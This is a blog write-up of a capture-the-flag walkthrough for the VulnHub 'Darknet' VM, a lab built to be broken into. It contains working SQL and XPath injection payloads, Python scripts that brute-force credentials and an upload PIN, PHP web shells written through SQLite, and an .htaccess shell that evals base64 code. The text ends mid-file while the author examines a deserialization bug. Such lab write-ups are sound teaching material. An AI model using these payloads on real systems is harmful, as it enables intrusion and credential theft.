<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-us">
<head>
  <link href="http://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">

  
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">

  <title>rooting darknet &middot; </title>

  
  <link rel="stylesheet" href="https://leonjza.github.io/css/poole.css">
  <link rel="stylesheet" href="https://leonjza.github.io/css/hyde.css">
  <link rel="stylesheet" href="https://leonjza.github.io/css/poole-overrides.css">
  <link rel="stylesheet" href="https://leonjza.github.io/css/hyde-overrides.css">
  <link rel="stylesheet" href="https://leonjza.github.io/css/hyde-x.css">
  <link rel="stylesheet" href="https://leonjza.github.io/css/highlight/solarized_light.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=PT+Sans:400,400italic,700|Abril+Fatface">
  <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">
  

  
  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://leonjza.github.io/touch-icon-144-precomposed.png">
  <link href="https://leonjza.github.io/favicon.png" rel="icon">

  
  
  
  

  <meta name="description" content="">
  <meta name="keywords" content="darknet,vulnhub,ctf,writeup">
  
  <script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

    ga('create', 'UA-44457032-2', 'auto');
    ga('send', 'pageview');
  </script>
  
</head>
<body class="theme-base-0d">
<div class="sidebar">
  <div class="container sidebar-sticky">
    <div class="sidebar-about">
      
        <img src="https://www.gravatar.com/avatar/28d2f6c24dad39f38af0272dfc0da953?s=200"
             alt="gravatar" title="">
      
      <h1></h1>
      <p class="lead">#!/slash/note<br />
<em>A checkbox unchecker&rsquo;s notepad</em></p>
    </div>

    <ul class="sidebar-nav">
      <li class="sidebar-nav-item"><a href="https://leonjza.github.io/post">Posts</a></li>
    </ul>

    <ul class="sidebar-nav">
      <li class="sidebar-nav-item"><a href="https://leonjza.github.io/">Home</a></li>
      
      <li class="sidebar-nav-item"><a href="https://leonjza.github.io/about/">About Me</a></li>
      
    </ul>

    <ul class="sidebar-nav">
      <li class="sidebar-nav-item">
      <a href="https://github.com/leonjza"><i class="fa fa-github-square fa-3x"></i></a>
      
      
      
      
      
      <a href="https://twitter.com/leonjza"><i class="fa fa-twitter-square fa-3x"></i></a>
      
      
      </li>
    </ul>

    

    <p>Copyright &copy; 2016</a><br/>
       Powered by <a href="http://gohugo.io">Hugo</a></p>
  </div>
</div>


<div class="content container">
  <div class="post">
    <h1 class="post-title">rooting darknet</h1>
    <span class="post-date">Jun 16, 2016 &middot; 22 minute read &middot; <a href="https://leonjza.github.io/blog/2016/06/16/rooting-darknet/#disqus_thread">Comments</a>
    
    <br/>
    <a class="label" href="https://leonjza.github.io/categories/ctf">ctf</a><a class="label" href="https://leonjza.github.io/categories/vulnerable-vm">vulnerable vm</a><a class="label" href="https://leonjza.github.io/categories/vulnhub">vulnhub</a><a class="label" href="https://leonjza.github.io/categories/solution">solution</a>
    </span>
    

<p>Its been a while since I have done a vulnerable boot2root from <a href="https://twitter.com/vulnhub">@VulnHub</a>. So, I decided to pick up where I last left. After paging back from the latest VM&rsquo;s to where I roughly stopped last year, my attention was drawn to <a href="https://www.vulnhub.com/entry/darknet-10,120/">Darknet</a> by <a href="https://twitter.com/Q3rv0">@Q3rv0</a>.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_logo.png" />
    
    
</figure>


<p>This is how I managed to solve a VM that totally kicked my ass! While I was solving this VM, I also tried out a Kali Docker image! This actually worked out great.</p>

<h2 id="getting-started">getting started</h2>

<p>Starting with these VM&rsquo;s is almost always the same story and Darknet was no different. Pick up the VM&rsquo;s IP address (yes, I still use the VMWare network sniffer <code>sudo /Applications/VMware\ Fusion.app/Contents/Library/vmnet-sniffer -e vmnet8</code>). <strong>192.168.252.140</strong>. On to the <code>nmap</code>!</p>

<pre><code>root@kali:~# nmap -v --reason 192.168.252.140 -sV

Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-16 20:13 UTC

[...]

Reason: 998 resets
PORT    STATE SERVICE REASON         VERSION
80/tcp  open  http    syn-ack ttl 37 Apache httpd 2.2.22 ((Debian))
111/tcp open  rpcbind syn-ack ttl 37 2-4 (RPC #100000)
</code></pre>

<p>Just <code>tcp/80</code> to work with really. <code>tcp/111</code> did not yield anything interesting at first glance, but the most obvious next step was definitely the web port.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_homepage.png" />
    
    
</figure>


<h2 id="888-darknet-com">888.darknet.com</h2>

<p>The homepage on the web server I have found so far was not very interesting. I scanned it with <code>gobuster</code> hoping to discover some more directories which revealed the existence of an <code>/access</code> folder.</p>

<pre><code>root@kali:~# gobuster -u http://192.168.252.140/ -w /usr/share/wordlists/wfuzz/general/common.txt

Gobuster v1.1                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.252.140/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/wfuzz/general/common.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/access (Status: 301)
/index (Status: 200)
=====================================================
</code></pre>

<p>Browsing to <a href="http://192.168.252.140/access/">http://192.168.252.140/access/</a> showed that directory indexing was enabled and revealed the <code>888.darknet.com.backup</code> file.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_access_folder.png" />
    
    
</figure>


<p>Downloading and inspecting the file, it quickly became apparent that this looked like an <a href="https://httpd.apache.org/docs/current/vhosts/examples.html">Apache Virtual Host</a> configuration.</p>

<pre><code>root@kali:~/data/VulnHub/Darknet# cat 888.darknet.com.backup
&lt;VirtualHost *:80&gt;
    ServerName 888.darknet.com
    ServerAdmin devnull@darknet.com
    DocumentRoot /home/devnull/public_html
    ErrorLog /home/devnull/logs
&lt;/VirtualHost&gt;
</code></pre>

<p>I immediately took this as a hint that I would have to hack an entry into my local <code>/etc/hosts</code> to resolve <em>888.darknet.com</em> to <em>192.168.252.140</em>. After having done that, we are presented with yet another page with a login.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_888_login.png" />
    
    
</figure>


<h2 id="888-authentication-bypass">888 authentication bypass</h2>

<p>Natural instinct has it that when you see login pages like these, you just throw some single quotes at the fields to see what happens. I did exactly this and was pleasantly met with an error response along the lines of <code>unrecognized token: &quot;3590cb8af0bbb9e78c343b52b93773c9&quot;</code>. This just <strong>screamed</strong> SQL injection! I figured since it seems to be reflecting errors back at the page, <code>sqlmap</code> might just quickly sort out this stage for us without much effort. <strong>Nope!</strong> After quite a bit of time, I learnt that the SQL injection only appears to be in the <code>username</code> field, but no matter how I tried to get <code>sqlmap</code> to play along, I was inevitably met with <code>[WARNING] POST parameter 'username' is not injectable</code> every time.</p>

<p>Admitting defeat, I figured I should stop being lazy and attempt the injection manually. The fact that the error message returned <code>unrecognized token</code> hinted towards the fact that the backend database might be SQLite. This gives me a frame of reference for the SQL dialect to use. Next, the most critical step for the injection to be successful was to try and envision what the query must look like in the backend. I played around quite a bit more, and got he most information out of the error message when I have the value <code>'&quot;1</code> as a username and any text as a password.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_888_login_error.png" />
    
    
</figure>


<p>Great. So with <code>&quot;&quot;1' and pass='03c7c0ace395d80182db07ae2c30f034'&quot;</code> as the error message, I theorized that the SQL query might be something along the lines of:</p>

<pre><code>SELECT * FROM users WHERE user='&lt;INJECT&gt;' and pass='&lt;MD5 OF PASS&gt;'
</code></pre>

<p>In the softwares logic then, there may be a requirement to just have a row return to mark the session as logged in. Makes sense right? :) So, in order to attempt an authentication bypass, I will need to try and get the query manipulated in such a way that the query will return a valid row regardless of the password. In SQL, we can have something like <code>SELECT 1</code> which will just return <code>1</code> in the row set.</p>

<pre><code>root@kali:~/data/VulnHub/Darknet# sqlite3
SQLite version 3.8.10.2 2015-05-20 18:17:19
Enter &quot;.help&quot; for usage hints.
Connected to a transient in-memory database.
Use &quot;.open FILENAME&quot; to reopen on a persistent database.
sqlite&gt; SELECT 1;
1
sqlite&gt;
</code></pre>

<p>With this knowledge, we can imagine that we could have the final query the software will execute look something like this:</p>

<pre><code>SELECT * FROM users WHERE user='a user' or '1' and pass='&lt;MD5 OF PASS&gt;'
</code></pre>

<p>In other words, if the injection point is in the <code>user</code> section, the payload we need to execute may be derived as follows:</p>

<p><code>SELECT * FROM users WHERE user='</code> <strong>a user&rsquo; or &lsquo;1</strong> <code>' and pass='&lt;MD5 OF PASS'&gt;</code></p>

<p>This obviously begs the requirement to have knowledge of a valid user! Well, remember that Apache Virtual host config file? It mentioned that the server admin is <code>devnull@darknet.com</code>. Admittedly, this took me a while to get to (and maybe a bit of a cheat :P), but using a username of <code>devnull</code> will complete the requirements we have to bypass the auth requirement for this page.</p>

<p>Considering the injection point and theorized query, we can use a username of <code>devnull' or 1'</code> and any password to login.</p>

<h2 id="administrator-sql-shell">administrator sql shell</h2>

<p>After login bypass I was presented with page titled <strong>Administrador SQL</strong>.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_888_administrator_sql.png" />
    
    
</figure>


<p>I tried a few queries but quickly realized that no output was returned no matter what you gave it.</p>

<p>While researching some of the possibilities with SQLite injection, I came across <a href="http://gwae.trollab.org/sqlite-injection.html">this</a> blogpost that details a method of writing arbitrary code to a file of our choosing (obviously assuming we have write access there). Considering I had a fictitious <em>SQL shell</em> now, I jumped right into trying this.</p>

<p>My first target was finding a writable directory. The blogpost mentions that <code>uploads/</code> and <code>cache/</code> are usually good candidates (and rightfully so), but it did not seem like the paths existed at <a href="http://888.darknet.com/uploads/">http://888.darknet.com/uploads/</a> and <a href="http://888.darknet.com/cache/">http://888.darknet.com/cache/</a>. So I pulled up <code>gobuster</code> again to see if there are any other directories I could potentially use for this.</p>

<pre><code>root@kali:~/data/VulnHub/Darknet# gobuster -u http://888.darknet.com/ -w /usr/share/wordlists/wfuzz/general/common.txt

Gobuster v1.1                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://888.darknet.com/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/wfuzz/general/common.txt
[+] Status codes : 302,307,200,204,301
=====================================================
/css (Status: 301)
/img (Status: 301)
/includes (Status: 301)
=====================================================
</code></pre>

<p>3 hits for <code>/css</code>, <code>/img</code> and <code>/includes</code>. Considering I had the VirtualHost configuration file, I also knew that these paths are most probably relative to the DocumentRoot at <code>/home/devnull/public_html</code>. Now, all I had to do was modify the payload as explained in the blogpost and cross my fingers. Without boring you with the nitty gritty details, I finally managed to figure out that I can write to the <code>/img</code> directory and gain some code execution.</p>

<pre><code>ATTACH DATABASE '/home/devnull/public_html/img/phpinfo.php' as pwn;
CREATE TABLE pwn.shell (code TEXT);
INSERT INTO pwn.shell (code) VALUES ('&lt;?php phpinfo(); ?&gt;');
</code></pre>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_888_phpinfo.png" />
    
    
</figure>


<p>Yeah&hellip; look at that. The amount of <code>disable_functions</code> values explain why my initial <code>system()</code> type PHP shells were failing. Nonetheless, I was still able to browse the filesystem with a very rudementary script injected using the SQL shell I still had. The payload was as follows that allowed me to browse around and cat things.</p>

<pre><code>ATTACH DATABASE '/home/devnull/public_html/img/files.php' as pwn;
CREATE TABLE pwn.shell (code TEXT);
INSERT INTO pwn.shell (code) VALUES (&quot;&lt;?php if($_GET['a'] == 'ls') { print_r(scandir($_GET['p'])); } if($_GET['a'] == 'cat') { print_r(readfile($_GET['p'])); } ?&gt;&quot;);
</code></pre>

<p>Looking at the <code>phpinfo()</code> output, I also noticed the <code>open_basedir</code> value was set to <code>/etc/apache2:/home/devnull:/tmp</code>. This is kinda what motivated me to slap together that quick file browsing script so that I can see whats so interesting in <code>/etc/apache2</code> (especially since we already had this one vhost config requirement to get to this stage).</p>

<p>Lastly, I also learnt that we are currently the <code>devnull</code> user on a Debian Linux box&hellip; Weird. I expected something like <code>www-data</code> but ok.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_888_id.png" />
    
    
</figure>


<p>Getting back to the <code>/etc/apache2</code> thing, I found another VirtualHost configuration file there in <code>/etc/apache2/sites-available/</code>. This was done using the <code>files.php</code> script I wrote and toggling the <code>a</code> parameter to <code>ls</code> or <code>cat</code> as needed. I was not able to find anything else interesting thanks to that epic <code>open_basedir</code> setting :/</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_888_signal8.png" />
    
    
</figure>


<h2 id="signal8-so-much-hate">signal8. so much hate.</h2>

<p>I added another entry to my <code>/etc/hosts</code> and browsed to the new hostname discovered in that configuration file.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_home.png" />
    
    
</figure>


<p>Poking around with the new website had a few points of interest but nothing that had any obvious bugs. The URL <a href="http://signal8.darknet.com/contact.php?id=1">http://signal8.darknet.com/contact.php?id=1</a> had something funny going on with the <code>id</code> field though I could not confirm if this was another SQL injection bug or not. A <code>robots.txt</code> also existed for this site and had the entry <code>Disallow: /xpanel/</code>. Browsing to this I was met with a login page.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel.png" />
    
    
</figure>


<p>The login page too did not seem to have any obvious bugs. Some quick scans with <code>nikto</code>, <code>sqlmap</code> etc did not show me anything I did not already know.</p>

<p><em>fast forward many many hours</em></p>

<p>Eventually, I resorted to fuzzing all of the fields in the new site that I have found. I literally tested all of them, but again let me not bore you with the failed attempts ;) I will however explain the general strategy.</p>

<p>I fired up BurpSuite, captured the request to <a href="http://signal8.darknet.com/contact.php?id=1">http://signal8.darknet.com/contact.php?id=1</a> and sent it to Intruder.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_fuzzing.png" />
    
    
</figure>


<p>Intruder was configured to use a simple fuzzing wordlist sourced from <code>/usr/share/wordlists/wfuzz/Injections/All_attack.txt</code>. Once the attack finished running, I went to the results and sorted them by response size. It was possible to quickly see those that returned an email address in the body and those that didn&rsquo;t based purely on the size. Using this list, I was able to filter out and realize that the payload of <code>count(/child::node())</code> managed to return a valid result.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpath_discovery.png" />
    
    
</figure>


<p>The first time I saw this I had no idea how much time I would be spending on this particular bug. In fact, I have never come across this before so this was <strong>by far</strong> the most educational portion of the challenge for me!</p>

<h2 id="xpath-injection">xpath injection</h2>

<p>Just googling the term <em>count(/child::node())</em> quickly revealed that this was something that related to XPath. XPath allows you to query XML datasets much like SQL can query databases. Ok great. Next up was a trip to owasp.org and their article on <a href="https://www.owasp.org/index.php/XPATH_Injection">XPATH Injection</a>. I spent quite a bit of time researching this type of vulnerability. I realized that the case I was dealing with here was blind XPath injection. Much like blind SQL injection, blind XPath injection can also be exploited by running &lsquo;queries&rsquo; that return true/false. The condition for true in this case was the fact that the email address appeared, and false was that it was missing from the response.</p>

<p>By far, <a href="http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Blind%20Xpath%20injection.pdf">this</a> PDF was the most useful in getting me to understand the vulnerability in the most depth.</p>

<p>Before I could exploit this bug though, I had to come up with a way to test the theories that I was reading about locally. To do this, I copied some XML that I found in one of the articles to start.</p>

<pre><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;Employees&gt;
   &lt;Employee ID=&quot;1&quot;&gt;
      &lt;FirstName&gt;Arnold&lt;/FirstName&gt;
      &lt;LastName&gt;Baker&lt;/LastName&gt;
      &lt;UserName&gt;ABaker&lt;/UserName&gt;
      &lt;Password&gt;SoSecret&lt;/Password&gt;
      &lt;Type&gt;Admin&lt;/Type&gt;
   &lt;/Employee&gt;
   &lt;Employee ID=&quot;2&quot;&gt;
      &lt;FirstName&gt;Peter&lt;/FirstName&gt;
      &lt;LastName&gt;Pan&lt;/LastName&gt;
      &lt;UserName&gt;PPan&lt;/UserName&gt;
      &lt;Password&gt;NotTelling&lt;/Password&gt;
      &lt;Type&gt;User&lt;/Type&gt;
   &lt;/Employee&gt;
&lt;/Employees&gt;
</code></pre>

<p>I then wrote a small PHP script that would allow me to test payloads as if it were injected into the XML on the site I have with the bug. This script looked as follows:</p>

<pre><code>&lt;?php

// Get the argument from the cli
$id = $argv[1];
$xpath = '//Employee[@ID=' . $id . ']/UserName';

// Be a little verbose about what the query will look like
print 'Injection    : ' . $id . PHP_EOL;
print 'Xpath        : ' . $xpath . PHP_EOL;
$xml = simplexml_load_file('test.xml');
print PHP_EOL;

// Run the XPath
$result = $xml-&gt;xpath($xpath);

// Return a result of the XPath was valid etc.
print 'Blind:' . PHP_EOL;
@print_r((string)$result[0]);

print PHP_EOL . PHP_EOL;

// Show the raw result of the XPath not filtered
print 'Raw:' . PHP_EOL;
print_r($result);
</code></pre>

<p>I studied some XPath functions available on <a href="http://devdocs.io/xslt_xpath-xpath-functions/">devdocs.io</a>. This reference together with what I read online as well as my small test scenario helped me figure that I could make use of the <a href="http://devdocs.io/xslt_xpath/xpath/functions/starts-with">starts-with()</a> XPath function. This proved to work in my little test environment.</p>

<pre><code>root@kali:~/data/VulnHub/Darknet# php readxml.php &quot;1 and starts-with(name(*[1]),'F')=1&quot;
Injection    : 1 and starts-with(name(*[1]),'F')=1
Xpath        : //Employee[@ID=1 and starts-with(name(*[1]),'F')=1]/UserName

Blind:
ABaker

Raw:
Array
(
    [0] =&gt; SimpleXMLElement Object
        (
            [0] =&gt; ABaker
        )

)
</code></pre>

<p>To test this scenario on Darknet, I took a guess at the node name of the field that is being returned as <code>email</code> considering its an email address that is being returned. It is possible to brute force these names as you will see later.
To start testing the feasibility of the blind boolean based injection, I entered the payload <code>1 and starts-with(email, 'e')</code> into the URL.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpath_booltest.png" />
    
    
</figure>


<p>Boom. The email address is returned! This meant that I could run over a large key space and brute force other parts of the underlying XML, hoping to learn more of its structure. For clarities sake, the <code>starts-with()</code> function will later be expanded to be something like <code>1 and starts-with(email, 'errorlevel')</code>. Using the payload <code>2 and starts-with(email, 'd')</code> will also return the <code>devnull@darknet.com</code> email address as that email starts with <code>d</code> which makes the XPath query true.</p>

<p>I was not going to test all of these characters by hand, nope. I had to figure out what this XML looks like, so I wrote some scripts to help with that. The first script attempts to brute force the names of the current node as well as the parent node. If we have these names we can call them in an XPath query by name. For eg, <code>//parent/current/attribute</code>.</p>

<pre><code>import requests
import string
import sys

entry_point = 'http://signal8.darknet.com/contact.php'

payloads = {
    # . == current node and .. == parent node
    'CurrentNode': '1 and starts-with(name(.),&quot;{exfil}&quot;)=1',
    'ParentNode': '1 and starts-with(name(..),&quot;{exfil}&quot;)=1',
}


def w(t):
    sys.stdout.write(t)
    sys.stdout.flush()


for payload_type, payload in payloads.iteritems():

    w(&quot;\n{}: &quot;.format(payload_type))

    stop = False
    exfil = ''
    while not stop:

        stop = True

        for char in string.printable:
            r = requests.get(
                entry_point, params={
                    'id': payload.format(exfil=(exfil + char))
                })
            if 'darknet.com' in r.text:
                exfil += char
                w(char)
                stop = False

print &quot;\nDone&quot;
</code></pre>

<p>The script in action, determining that the XML has the structure <code>//auth/user</code>:
<script type="text/javascript" src="https://asciinema.org/a/ckyep1yvit8jxfo5fqbfxzn3u.js" id="asciicast-ckyep1yvit8jxfo5fqbfxzn3u" async></script></p>

<p>I was now able to theorize that the XML may have the following structure when calling user information. <code>//auth/user[@id=1]/email</code> where <code>1</code> is the ID of the user in question. I knew about the <code>email</code> field as it was <em>almost</em> obvious. I also discovered the <code>username</code> field by guessing. I tried to apply the same brute force logic as I did to the values, but for some reason I was not getting any luck with payloads where I was trying to address attributes by position, such as with <code>[*1]</code> for the first. This did work in my local test environment but not on Darknet. I had everything I needed to get the credentials for login (I think?), but did not have the passwords.</p>

<p>Eventually I wrote another script to take some words from a wordlist and brute the attribute names, hoping to discover some more attributes!</p>

<pre><code>import requests
import string
import sys

entry_point = 'http://signal8.darknet.com/contact.php'

payload = '1 and starts-with(name(//auth/user[id=1]/{word}),&quot;{word}&quot;)=1'
with open('/usr/share/wfuzz/wordlist/general/spanish.txt') as f:
    for word in f.readlines():
        word = word.strip()
        r = requests.get(entry_point, params={'id': payload.format(word=word)})
        if 'darknet.com' in r.text:
            print 'Found attribute: {word}'.format(word=word)

</code></pre>

<p>Having noticed a large part of the sites have been in Spanish, I eventually used a Spanish wordlist and found the field name <code>clave</code> with it. Urgh, that was mildly frustrating. Anyways, this script in action:
<script type="text/javascript" src="https://asciinema.org/a/4fsl2fzb45yhpxxmr6ycwjpfe.js" id="asciicast-4fsl2fzb45yhpxxmr6ycwjpfe" async></script></p>

<p>Finally. <code>username</code> &amp; <code>clave</code>! As the final piece to this puzzle, I took the original script used to brute force the XML structure and modified the payloads to now brute the values for <code>username</code> and <code>clave</code>! The new payloads were:</p>

<pre><code>'username': '1 and starts-with((//auth/user[id=1]/username),&quot;{exfil}&quot;)=1',
'password': '1 and starts-with((//auth/user[id=1]/clave),&quot;{exfil}&quot;)=1',
</code></pre>

<p>The brute force script in action with the new payloads:
<script type="text/javascript" src="https://asciinema.org/a/4obby2xqro3xo8gomfwh427mu.js" id="asciicast-4obby2xqro3xo8gomfwh427mu" async></script></p>

<p>So the username and password combination that lets you login at <a href="http://signal8.darknet.com/xpanel/">http://signal8.darknet.com/xpanel/</a> is <code>errorlevel</code> / <code>tc65Igkq6DF</code>.</p>

<h1 id="the-ploy">the ploy</h1>

<p>Once you have logged in, you presented with a page with a login to <em>Editor PHP</em>.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel_loggedin.png" />
    
    
</figure>


<p>The link to <code>edit.php</code> had little value as it simply appeared to be a &lsquo;troll&rsquo; page. I guess the humor here is the fact that code/os command execution has been relatively painful and this may have been a sign of hope.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel_troll_edit.png" />
    
    
</figure>


<p>When I viewed the page sources for the page I got when I just logged it, I saw a hint to a <code>ploy.php</code> page.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel_ploy.png" />
    
    
</figure>


<p>Browsing to <code>ploy.php</code>, I was met with a file upload and a series of checkboxes to tick.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel_ploy_upload.png" />
    
    
</figure>


<p>It very quickly became obvious that you have to select the right combination of checkboxes in order to be allowed to upload anything. Each checkbox had a numeric value, so I copied this out into a script and proceeded to try all of the combinations possible. I knew a combination was correct if the Spanish term <em>Key incorrecta!</em> was not in the response. With some manual fiddling, I also learnt that the key was 4 integers long. Attempting a combination with more or less than 4 keys meant that the HTTP response had <em>La longitud de la clave no es la correcta!</em></p>

<pre><code>import requests
import itertools
import sys

VALUES = [37, 12, 59, 58, 72, 17, 22, 10, 99]
PIN = None

s = requests.Session()


def w(text):
    sys.stdout.write('\r' + text)
    sys.stdout.flush()


# Need a valid session before we can continue.
print('[+] Logging in')
s.post('http://signal8.darknet.com/xpanel/index.php', data={
    'username': 'errorlevel',
    'password': 'tc65Igkq6DF',
})

print('[+] Bruting PIN Code ...')
for c in itertools.permutations(VALUES, 4):
    w(&quot;{pin}&quot;.format(pin=', '.join(map(str, c))))
    r = s.post('http://signal8.darknet.com/xpanel/ploy.php',
               files={'imag': open('test_image.png', 'rb')},
               data={
                   'checkbox[]': c,
                   'Action': 'Upload',
               })

    if 'incorrecta' not in r.text:
        print('\n[+] Found pin: {pin}'.format(pin=', '.join(map(str, c))))
        break

</code></pre>

<p>Seeing this script in action would look as follows:
<script type="text/javascript" src="https://asciinema.org/a/13eq1usld7zxx2yoj55khbhwp.js" id="asciicast-13eq1usld7zxx2yoj55khbhwp" async></script></p>

<p>So the pin code was <code>37, 10, 59, 17</code>. Easy.</p>

<p>The next obvious step was to try and figure out how we can weaponize this file upload, if at all. The file upload appeared to accept most uploads except for those ending in .php. Uploading a PHP script would return the error <em>Formato invalido!</em> Things like images (or almost anything that was not useful) responded with <em>Subida exitosa!</em></p>

<p>I managed to discover a <code>uploads/</code> directory with <code>gobuster</code> again that helped me locate the uploaded files that I was uploading. The filenames appeared to remain intact which made things a little easier. But, this did not help me. I really hoped for some code execution.</p>

<p><em>fast forward even more hours</em></p>

<p>Eventually, I came across some PHP file upload bypass techniques that involve <code>.htaccess</code> files. The premise being that if its possible to write/overwrite a folders <code>.htaccess</code>, then it may be possible to <a href="http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html">add a tiny backdoor shell</a> to a folder. Sneaky! The only real requirement was that the VirtualHost configuration had to allow for <code>.htaccess</code> files to be read. As I had already downloaded the configuration file for signal8.darknet.com, I could quickly see that <code>AllowOverride</code> was set to <code>All</code>. Fantastic!</p>

<p>I picked a shell from the <a href="https://github.com/wireghoul/htshells">https://github.com/wireghoul/htshells</a> repository <a href="https://github.com/wireghoul/htshells/blob/master/shell/mod_php.shell.htaccess">here</a>. From my previous testing, I wrote a small uploader so that I wouldn&rsquo;t have to click those checkboxes all the time.</p>

<pre><code>import requests
import sys
import os.path as path

s = requests.Session()


def w(text):
    sys.stdout.write('\r' + text)
    sys.stdout.flush()


print('[+] Logging in ...')
s.post('http://signal8.darknet.com/xpanel/index.php', data={
    'username': 'errorlevel',
    'password': 'tc65Igkq6DF',
})

print('[+] Uploading : {file}'.format(file=sys.argv[1]))
r = s.post('http://signal8.darknet.com/xpanel/ploy.php',
           files={'imag': open(sys.argv[1], 'rb')},
           data={
               'checkbox[]': [37, 10, 59, 17],
               'Action': 'Upload',
           })

if 'Subida exitosa' in r.text:
    print('[+] Upload successful! Try: http://signal8.darknet'
          '.com/xpanel/uploads/{file}'.format(file=path.basename(sys.argv[1])))
elif 'Formato invalido' in r.text:
    print('[!] Upload failed. Invalid format.')
else:
    print('[!] Upload failed, unknown error.')
</code></pre>

<p>All I had to do was runt his script, providing the filename that I want to upload and viola.</p>

<pre><code>root@kali:~/data/VulnHub/Darknet# python bruteUploader.py .htaccess
[+] Logging in ...
[+] Uploading : .htaccess
[+] Upload successful! Try: http://signal8.darknet.com/xpanel/uploads/.htaccess
</code></pre>

<p>Once uploaded, I browsed to the location and was met with what looks like some code execution again!</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel_shell.png" />
    
    
</figure>


<p>As expected, the OS command execution does not work due to all those <code>disable_functions</code>, but we have PHP code execution so that was a start! I decided that for this one I wanted to try get a more fully featured shell working. So, I edited the <code>.htaccess</code> to include a web shell that <a href="https://gist.github.com/leonjza/8e9d16c84cf70014c4f36d8f95f9836e">I was working quite some time ago</a> (and finally kinda finished). I packed the shell and replaced the PHP in the <code>.htaccess</code> with the more fully featured shells packed source.</p>

<pre><code># &lt;!--  Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
&lt;Files ~ &quot;^\.ht&quot;&gt;
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all
&lt;/Files&gt;

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### --&gt;&lt;?php eval(base64_decode(&quot;LONG BASE64 ENCODED STRING&quot;));
</code></pre>

<p>Uploaded this with my upload helper and boom, a better shell.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel_shell2.png" />
    
    
</figure>


<h2 id="the-last-hurdle-s">the last hurdle(s)</h2>

<p>Wtf. The current user is <code>errorlevel</code>&hellip; I double checked and saw that previously we were the <code>devnull</code> user. This had me pretty confused in the beginning and had me spend quite a bit of time to figure out how this is possible. From the <code>phpinfo()</code> output we had no <code>open_basedir</code> restriction so that allowed me to move around the filesystem much more freely than before. I also noticed that I am not able to access the home directory for the <code>errorlevel</code> user so I couldn&rsquo;t really figure out what was going on in there (the red color indicates read/write is not possible).</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel_homedirs.png" />
    
    
</figure>


<p>Eventually, I discovered the use of <a href="http://www.suphp.org/">suPHP</a> as a loaded module. This basically means that the PHP script will run as the owner of the file. So with that theory, its sane to assume that because <code>errorlevel</code> owns the PHP files in the users home directory, that is why I am seen as that user too.</p>

<p>Anyways, some more enumeration later, I discover some more PHP scripts in <code>/var/www</code>. These were owned by <code>root</code>, meaning that if there are any vulnerabilities, I could effectively become root!</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel_var_www.png" />
    
    
</figure>


<p>Due to the fact that these were in <code>/var/www</code>, I could just browse to the IP address of the VM and run these scripts. Calling the <code>sec.php</code> script caused the server to return an HTTP 500 error.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_sec_error.png" />
    
    
</figure>


<p>As I was able to read the files in <code>/var/www</code>, I also downloaded <code>sec.php</code> to get an idea of what its supposed to be doing.</p>

<pre><code>&lt;?php

require &quot;Classes/Test.php&quot;;
require &quot;Classes/Show.php&quot;;

if(!empty($_POST['test'])){
    $d=$_POST['test'];
    $j=unserialize($d);
    echo $j;
}
?&gt;
</code></pre>

<p>The call to <code>unserialize()</code> immediately hinted me towards what the next step would need to be. I continued to download the files that are required in the <code>Classes/</code> folder.</p>

<p>Test.php</p>

<pre><code>&lt;?php

class Test {

    public $url;
    public $name_file;
    public $path;

    function __destruct(){
        $data=file_get_contents($this-&gt;url);
